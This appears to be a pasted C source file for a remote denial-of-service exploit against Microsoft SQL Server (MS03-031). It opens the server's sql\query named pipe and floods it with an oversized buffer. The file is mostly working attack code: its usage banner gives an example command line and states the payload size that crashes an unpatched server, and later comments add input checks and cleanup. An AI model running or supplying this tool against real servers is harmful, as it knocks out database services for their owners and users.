emS-St1ks

MS Windows SQL Server Remote Exploit (MS03-031 named-pipe denial of service)

Oct 3rd, 2014
  1. ////////////////////////////////////////////////////////////////
  2. //    
  3. //      Microsoft SQL Server DoS Remote Exploit
  4. //                    By l00ser of st1ks great update
  5. //  
  6. ////////////////////////////////////////////////////////////////
  7.  
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
  11.  
  12.  
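/*
 * Print the banner and command-line usage for the tool.
 *
 * Output only: no arguments, no return value, no state touched.  The
 * "buffersize" argument is the number of payload bytes main() sends down
 * the target's named pipe; the original author notes that the value which
 * actually crashes a target depends on its service-pack level.
 */
void Usage(void)
{
    printf("******************************************\n");
    printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
    printf("\t Written by Refdom\n");
    printf("\t Email: refdom xfocus org\n");
    printf("\t Homepage: www.xfocus.org\n\n");
    printf("Usage: DOSMSSQL.exe server buffersize\n");
    /* Fixed: the example used to run the program name and host together
     * ("DOSMSSQL.exe192.168.0.1"), which is not a valid invocation. */
    printf("eg: DOSMSSQL.exe 192.168.0.1 9000\n\n");
    printf("The buffersize depends on service pack level.\n");
    printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
    printf("when buffersize is 9000, the server can be crashed.\n");
    printf("\n");
    printf("*******************************************\n\n");
}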
  28.  
  29.  
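/*
 * Entry point: open the target's SQL Server named pipe and write a single
 * oversized message to it (the MS03-031 named-pipe denial of service).
 *
 * argv[1] is the server name or address (at most 19 characters, as in the
 * original guard), argv[2] the number of payload bytes to send.  Returns 0
 * when the write succeeds and 1 on any usage, allocation or Win32 failure
 * (the original returned 0 unconditionally; callers that scripted on the
 * exit code should note the change).
 *
 * SECURITY: this is a denial-of-service tool against a service that is
 * unpatched for MS03-031.  Run it only against hosts you are authorised to
 * test; reaching \\host\...\pipe\... also requires SMB access to the target,
 * which this code does not check or report separately.
 *
 * Changes from the original:
 *  - argv[2] is parsed with strtoul and range-checked.  atol() accepted
 *    junk and negative values, and a size near ULONG_MAX made
 *    `malloc(ulSize + 2)` wrap to a tiny allocation that memset() then
 *    overran; a size of 0 made the header write at offset 2 land one byte
 *    past a 2-byte allocation.
 *  - sprintf into the 50-byte pipe-name buffer is replaced by a bounded
 *    snprintf with an explicit truncation check.
 *  - The pipe handle and the payload are released on every exit path.
 *  - GetLastError() (a DWORD) is printed with %lu instead of %d.
 */
int main(int argc, char *argv[])
{
    enum {
        MAX_SERVER_LEN = 19, /* original accepted strlen(argv[1]) < 20 */
        PIPE_NAME_LEN = 50,
        MIN_PAYLOAD = 3      /* the three fixed leading bytes must fit */
    };
    char pipe_name[PIPE_NAME_LEN];
    char *payload = NULL;
    unsigned long payload_len = 0;
    HANDLE pipe = INVALID_HANDLE_VALUE;
    DWORD written = 0;
    DWORD mode = PIPE_READMODE_MESSAGE;
    int rc = 1;

    Usage();
    printf("Starting...\n");

    if (argc != 3)
        goto out;

    if (strlen(argv[1]) > MAX_SERVER_LEN) {
        printf("Error!server\n");
        goto out;
    }

    /* NOTE(review): the format below expands to \\host\\.\pipe\sql\query,
     * exactly as the original wrote it.  The conventional remote form is
     * \\host\pipe\sql\query; confirm against a live target before changing
     * it, since the pipe path is the whole of this tool's behaviour. */
    {
        int n = snprintf(pipe_name, sizeof pipe_name,
                         "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
        if (n < 0 || (size_t)n >= sizeof pipe_name) {
            printf("Error!server\n");
            goto out;
        }
    }

    /* Strict numeric parse: whole string must be digits, must not overflow,
     * must leave room for the +2 allocation below and for the three fixed
     * header bytes. */
    {
        char *end = NULL;
        errno = 0;
        payload_len = strtoul(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE
            || payload_len < MIN_PAYLOAD
            || payload_len > ULONG_MAX - 2) {
            printf("Error!buffersize\n");
            goto out;
        }
    }

    payload = malloc(payload_len + 2);
    if (payload == NULL) {
        printf("malloc error!\n");
        goto out;
    }
    memset(payload, 0, payload_len + 2);
    memset(payload, 'A', payload_len);
    /* Leading bytes are kept as in the original PoC.  0x12 / 0x01 look like
     * a TDS pre-login packet type and end-of-message status, but the source
     * does not say so; treat that reading as unconfirmed. */
    payload[0] = '\x12';
    payload[1] = '\x01';
    payload[2] = '\x00';

    printf("Connecting Server...\n");

    /* CreateFileA explicitly: pipe_name is a narrow string regardless of
     * whether UNICODE is defined at build time. */
    pipe = CreateFileA(pipe_name, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                       OPEN_EXISTING, 0, NULL);
    if (pipe == INVALID_HANDLE_VALUE) {
        printf("Error!Connect server!%lu\n", (unsigned long)GetLastError());
        goto out;
    }

    if (!SetNamedPipeHandleState(pipe, &mode, NULL, NULL)) {
        printf("Error!SetNamedPipeHandleState.%lu\n",
               (unsigned long)GetLastError());
        goto out;
    }

    /* payload_len + 1 bytes, as in the original: the 'A' run plus one of
     * the two trailing zero bytes. */
    if (!WriteFile(pipe, payload, (DWORD)(payload_len + 1), &written, NULL)) {
        printf("\n\tError!WriteFile.%lu\n\n", (unsigned long)GetLastError());
        printf("When see the error message, the target may be crashed!!\n\n");
        goto out;
    }
    rc = 0;

out:
    if (pipe != INVALID_HANDLE_VALUE)
        CloseHandle(pipe);
    free(payload);
    return rc;
}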